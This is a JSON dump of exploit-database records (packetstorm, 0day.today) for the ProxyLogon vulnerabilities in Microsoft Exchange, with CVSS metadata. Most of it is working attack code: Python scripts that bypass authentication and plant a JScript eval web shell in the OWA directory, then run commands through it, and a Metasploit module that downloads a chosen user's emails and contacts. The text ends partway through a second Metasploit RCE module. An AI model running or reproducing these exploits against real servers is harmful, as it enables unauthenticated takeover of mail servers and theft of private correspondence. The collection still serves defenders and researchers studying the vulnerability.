\n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": user_agent}, \ndata=autoDiscoverBody, \nproxies=proxies, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(ct.status_code) \nprint(\"Autodiscover Error!\") \nexit() \n \nif \"<LegacyDN>\" not in str(ct.content): \nprint(\"Can not get LegacyDN!\") \nexit() \n \nlegacyDn = str(ct.content).split(\"<LegacyDN>\")[1].split(r\"</LegacyDN>\")[0] \nprint(\"Got DN: \" + legacyDn) \n \nmapi_body = legacyDn + \"\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;\" % FQDN, \n\"Content-Type\": \"application/mapi-http\", \n\"X-Requesttype\": \"Connect\", \n\"X-Clientinfo\": \"{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}\", \n\"X-Clientapplication\": \"Outlook/15.0.4815.1002\", \n\"X-Requestid\": \"{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456\", \n\"User-Agent\": user_agent \n}, \ndata=mapi_body, \nverify=False, \nproxies=proxies \n) \nif ct.status_code != 200 or \"act as owner of a UserMailbox\" not in str(ct.content): \nprint(\"Mapi Error!\") \nexit() \n \nsid = str(ct.content).split(\"with SID \")[1].split(\" and MasterAccountSid\")[0] \n \nprint(\"Got SID: \" + sid) \nsid = sid.replace(sid.split(\"-\")[-1],\"500\") \n \nproxyLogon_request = \"\"\"<r at=\"Negotiate\" ln=\"john\"><s>%s</s><s a=\"7\" t=\"1\">S-1-1-0</s><s a=\"7\" t=\"1\">S-1-5-2</s><s a=\"7\" t=\"1\">S-1-5-11</s><s a=\"7\" t=\"1\">S-1-5-15</s><s a=\"3221225479\" t=\"1\">S-1-5-5-0-6948923</s></r> \n\"\"\" % sid \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"User-Agent\": user_agent \n}, \ndata=proxyLogon_request, \nproxies=proxies, \nverify=False \n) \nif ct.status_code != 241 or not \"set-cookie\" in ct.headers: \nprint(\"Proxylogon Error!\") \nexit() \n \nsess_id = ct.headers['set-cookie'].split(\"ASP.NET_SessionId=\")[1].split(\";\")[0] \n \nmsExchEcpCanary = ct.headers['set-cookie'].split(\"msExchEcpCanary=\")[1].split(\";\")[0] \nprint(\"Got session id: \" + sess_id) \nprint(\"Got canary: \" + msExchEcpCanary) \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; \", \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"User-Agent\": user_agent \n \n}, \njson={\"filter\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"SelectedView\": \"\", \"SelectedVDirType\": \"All\"}}, \"sort\": {}}, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(\"GetOAB Error!\") \nexit() \noabId = str(ct.content).split('\"RawIdentity\":\"')[1].split('\"')[0] \nprint(\"Got OAB id: \" + oabId) \n \noab_json = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"ExternalUrl\": \"http://ffff/#%s\" % shell_content}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=oab_json, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Set external url Error!\") \nexit() \n \nreset_oab_body = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"FilePathName\": shell_absolute_path}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=reset_oab_body, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(\"\u5199\u5165shell\u5931\u8d25\u4e86\u554a\") \nexit() \n \nprint(\"\u6210\u529f\u4e86\u3002\u9a6c\u4e0a\u5c31\u9a8c\u8bc1shell\u662f\u5426OK!\") \nprint(\"POST shell:https://\"+target+\"/owa/auth/test11.aspx\") \nshell_url=\"https://\"+target+\"/owa/auth/test11.aspx\" \nprint('code=Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());') \nprint(\"\u6b63\u5728\u8bf7\u6c42shell\") \ndata=requests.post(shell_url,data={\"code\":\"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").exec(\\\"whoami\\\").StdOut.ReadAll());\"},verify=False) \nif data.status_code != 200: \nprint(\"\u5199\u5165shell\u5931\u8d25\") \nelse: \nprint(\"\u6743\u9650\u5982\u4e0b\uff1a\"+data.text.split(\"OAB (Default Web Site)\")[0].replace(\"Name : \",\"\")) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161846/msexchange2019-ssrfexec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-11-09T12:40:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-21T00:00:00", "type": "zdt", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-05-21T00:00:00", "id": "1337DAY-ID-36281", "href": "https://0day.today/exploit/description/36281", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)\n# Exploit Author: RAMELLA S\u00e9bastien\n# Vendor Homepage: https://microsoft.com\n# Version: This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n# Tested on: Microsoft Windows 2012 R2 - Exchange 2016\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# begin auxiliary class\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon Collector',\n 'Description' => %q{\n This module scan for a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication and impersonating as the\n admin (CVE-2021-26855).\n\n By chaining this bug with another post-auth arbitrary-file-write\n vulnerability to get code execution (CVE-2021-27065).\n\n As a result, an unauthenticated attacker can execute arbitrary commands on\n Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse'],\n ['URL', 'http://aka.ms/exchangevulns']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'AKA' => ['ProxyLogon']\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'The email account what you want dump']),\n OptString.new('FOLDER', [true, 'The email folder what you want dump', 'inbox']),\n OptString.new('SERVER_NAME', [true, 'The name of secondary internal Exchange server targeted'])\n ])\n\n register_advanced_options([\n OptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 512])\n ])\n end\n\n XMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze\n\n def grab_contacts\n response = send_xml(soap_findcontacts)\n xml = Nokogiri::XML.parse(response.body)\n\n data = xml.xpath('//t:Contact', XMLNS)\n if data.empty?\n print_status(' - the user has no contacts')\n else\n write_loot(data.to_s)\n end\n end\n\n def grab_emails(total_count)\n # get the emails list of the target folder.\n response = send_xml(soap_maillist(total_count))\n xml = Nokogiri::XML.parse(response.body)\n\n # iteration to download the emails.\n xml.xpath('//t:ItemId', XMLNS).each do |item|\n print_status(\" - download item: #{item.values[1]}\")\n response = send_xml(soap_download(item.values[0], item.values[1]))\n xml = Nokogiri::XML.parse(response.body)\n\n message = xml.at_xpath('//t:MimeContent', XMLNS).content\n write_loot(Rex::Text.decode_base64(message))\n end\n end\n\n def send_xml(data)\n uri = normalize_uri('ecp', 'temp.js')\n\n received = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => \"X-BEResource=#{datastore['SERVER_NAME']}/EWS/Exchange.asmx?a=~3;\",\n 'ctype' => 'text/xml; charset=utf-8',\n 'data' => data\n )\n fail_with(Failure::Unknown, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def soap_download(id, change_key)\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetItem>\n <m:ItemShape>\n <t:BaseShape>IdOnly</t:BaseShape>\n <t:IncludeMimeContent>true</t:IncludeMimeContent>\n </m:ItemShape>\n <m:ItemIds>\n <t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" />\n </m:ItemIds>\n </m:GetItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_findcontacts\n <<~SOAP\n <?xml version='1.0' encoding='utf-8'?>\n <soap:Envelope\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\n <soap:Body>\n <m:FindItem Traversal='Shallow'>\n <m:ItemShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:ItemShape>\n <m:IndexedPageItemView MaxEntriesReturned=\"#{datastore['MaxEntries']}\" Offset=\"0\" BasePoint=\"Beginning\" />\n <m:ParentFolderIds>\n <t:DistinguishedFolderId Id='contacts'>\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:ParentFolderIds>\n </m:FindItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_mailnum\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>Default</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"#{datastore['FOLDER']}\">\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_maillist(max_entries)\n <<~SOAP\n <?xml version='1.0' encoding='utf-8'?>\n <soap:Envelope\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\n <soap:Body>\n <m:FindItem Traversal='Shallow'>\n <m:ItemShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:ItemShape>\n <m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" />\n <m:ParentFolderIds>\n <t:DistinguishedFolderId Id='#{datastore['FOLDER']}'>\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:ParentFolderIds>\n </m:FindItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def write_loot(data)\n loot_path = store_loot('', 'text/plain', datastore['RHOSTS'], data, '', '')\n print_good(\" - file saved to #{loot_path}\")\n end\n\n def run\n # get the informations about the targeted user account.\n response = send_xml(soap_mailnum)\n if response.body =~ /Success/\n print_status('Connection to the server is successful')\n print_status(\" - selected account: #{datastore['EMAIL']}\\n\")\n\n # grab contacts.\n print_status('Attempt to dump contacts list for this user')\n grab_contacts\n\n print_line\n\n # grab emails.\n print_status('Attempt to dump emails for this user')\n xml = Nokogiri::XML.parse(response.body)\n folder_id = xml.at_xpath('//t:FolderId', XMLNS).values\n print_status(\" - selected folder: #{datastore['FOLDER']} (#{folder_id[0]})\")\n\n total_count = xml.at_xpath('//t:TotalCount', XMLNS).content\n print_status(\" - number of email found: #{total_count}\")\n\n if total_count.to_i > datastore['MaxEntries']\n print_warning(\" - number of email recaluled due to max entries: #{datastore['MaxEntries']}\")\n total_count = datastore['MaxEntries'].to_s\n end\n grab_emails(total_count)\n end\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36281", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-22T06:55:42", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T00:00:00", "type": "zdt", "title": "Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-03-11T00:00:00", "id": "1337DAY-ID-35944", "href": "https://0day.today/exploit/description/35944", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)\r\n# Date: 2021-03-10\r\n# Exploit Author: testanull\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Version: MS Exchange Server 2013, 2016, 2019\r\n# CVE: 2021-26855, 2021-27065\r\n\r\nimport requests\r\nfrom urllib3.exceptions import InsecureRequestWarning\r\nimport random\r\nimport string\r\nimport sys\r\n\r\n\r\ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits):\r\n return ''.join(random.choice(chars) for _ in range(size))\r\n\r\nif len(sys.argv) < 2:\r\n\tprint(\"Usage: python PoC.py <target> <email>\")\r\n\tprint(\"Example: python PoC.py mail.evil.corp [email\u00a0protected]\")\r\n\texit()\r\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\r\ntarget = sys.argv[1]\r\nemail = sys.argv[2]\r\nrandom_name = id_generator(3) + \".js\"\r\nuser_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\"\r\n\r\nshell_path = \"Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\ahihi.aspx\"\r\nshell_absolute_path = \"\\\\\\\\127.0.0.1\\\\c$\\\\%s\" % shell_path\r\n\r\nshell_content = '<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"exec_code\"],\"unsafe\");}</script>'\r\nlegacyDnPatchByte = \"68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a\"\r\nautoDiscoverBody = \"\"\"<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\r\n <Request>\r\n <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\r\n </Request>\r\n</Autodiscover>\r\n\"\"\" % email\r\n\r\nprint(\"Attacking target \" + target)\r\nprint(\"=============================\")\r\nprint(legacyDnPatchByte.decode('hex'))\r\nFQDN = \"EXCHANGE\"\r\nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\"Cookie\": \"X-BEResource=localhost~1942062522\",\r\n \"User-Agent\": user_agent},\r\n verify=False)\r\nif \"X-CalculatedBETarget\" in ct.headers and \"X-FEServer\" in ct.headers:\r\n FQDN = ct.headers[\"X-FEServer\"]\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;\" % FQDN,\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": user_agent},\r\n data=autoDiscoverBody,\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"Autodiscover Error!\")\r\n exit()\r\nif \"<LegacyDN>\" not in ct.content:\r\n print(\"Can not get LegacyDN!\")\r\n exit()\r\n\r\nlegacyDn = ct.content.split(\"<LegacyDN>\")[1].split(\"</LegacyDN>\")[0]\r\nprint(\"Got DN: \" + legacyDn)\r\n\r\nmapi_body = legacyDn + \"\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/mapi/[email\u00a0protected]ab&a=~1942062522;\" % FQDN,\r\n \"Content-Type\": \"application/mapi-http\",\r\n \"User-Agent\": user_agent\r\n},\r\n data=mapi_body,\r\n verify=False\r\n )\r\nif ct.status_code != 200 or \"act as owner of a UserMailbox\" not in ct.content:\r\n print(\"Mapi Error!\")\r\n exit()\r\n\r\nsid = ct.content.split(\"with SID \")[1].split(\" and MasterAccountSid\")[0]\r\n\r\nprint(\"Got SID: \" + sid)\r\n\r\nproxyLogon_request = \"\"\"<r at=\"Negotiate\" ln=\"john\"><s>%s</s><s a=\"7\" t=\"1\">S-1-1-0</s><s a=\"7\" t=\"1\">S-1-5-2</s><s a=\"7\" t=\"1\">S-1-5-11</s><s a=\"7\" t=\"1\">S-1-5-15</s><s a=\"3221225479\" t=\"1\">S-1-5-5-0-6948923</s></r>\r\n\"\"\" % sid\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/proxyLogon.ecp?a=~1942062522;\" % FQDN,\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": user_agent\r\n},\r\n data=proxyLogon_request,\r\n verify=False\r\n )\r\nif ct.status_code != 241 or not \"set-cookie\" in ct.headers:\r\n print(\"Proxylogon Error!\")\r\n exit()\r\n\r\nsess_id = ct.headers['set-cookie'].split(\"ASP.NET_SessionId=\")[1].split(\";\")[0]\r\n\r\nmsExchEcpCanary = ct.headers['set-cookie'].split(\"msExchEcpCanary=\")[1].split(\";\")[0]\r\nprint(\"Got session id: \" + sess_id)\r\nprint(\"Got canary: \" + msExchEcpCanary)\r\n\r\nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, sess_id, msExchEcpCanary),\r\n \"User-Agent\": user_agent\r\n},\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"Wrong canary!\")\r\n print(\"Sometime we can skip this ...\")\r\nrbacRole = ct.content.split(\"RBAC roles:</span> <span class='diagTxt'>\")[1].split(\"</span>\")[0]\r\n# print \"Got rbacRole: \"+ rbacRole\r\n\r\nprint(\"=========== It means good to go!!!====\")\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),\r\n \"Content-Type\": \"application/json; charset=utf-8\",\r\n \"User-Agent\": user_agent\r\n\r\n},\r\n json={\"filter\": {\r\n \"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\",\r\n \"SelectedView\": \"\", \"SelectedVDirType\": \"All\"}}, \"sort\": {}},\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"GetOAB Error!\")\r\n exit()\r\noabId = ct.content.split('\"RawIdentity\":\"')[1].split('\"')[0]\r\nprint(\"Got OAB id: \" + oabId)\r\n\r\noab_json = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId},\r\n \"properties\": {\r\n \"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\",\r\n \"ExternalUrl\": \"http://ffff/#%s\" % shell_content}}}\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),\r\n \"Content-Type\": \"application/json; charset=utf-8\",\r\n \"User-Agent\": user_agent\r\n},\r\n json=oab_json,\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"Set external url Error!\")\r\n exit()\r\n\r\nreset_oab_body = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId},\r\n \"properties\": {\r\n \"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\",\r\n \"FilePathName\": shell_absolute_path}}}\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),\r\n \"Content-Type\": \"application/json; charset=utf-8\",\r\n \"User-Agent\": user_agent\r\n},\r\n json=reset_oab_body,\r\n verify=False\r\n )\r\n\r\nif ct.status_code != 200:\r\n print(\"Write Shell Error!\")\r\n exit()\r\n\r\nprint(\"Successful!\")\n\n# 0day.today [2021-09-22] #", "sourceHref": "https://0day.today/exploit/35944", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-30T08:02:52", "description": "This Metasploit module exploits a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication, impersonating as the admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get the RCE (Remote Code Execution). By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects Exchange 2013 Versions less than 15.00.1497.012, Exchange 2016 CU18 less than 15.01.2106.013, Exchange 2016 CU19 less than 15.01.2176.009, Exchange 2019 CU7 less than 15.02.0721.013, and Exchange 2019 CU8 less than 15.02.0792.010. All components are vulnerable by default.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-23T00:00:00", "type": "zdt", "title": "Microsoft Exchange ProxyLogon Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-23T00:00:00", "id": "1337DAY-ID-36024", "href": "https://0day.today/exploit/description/36024", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon RCE',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker 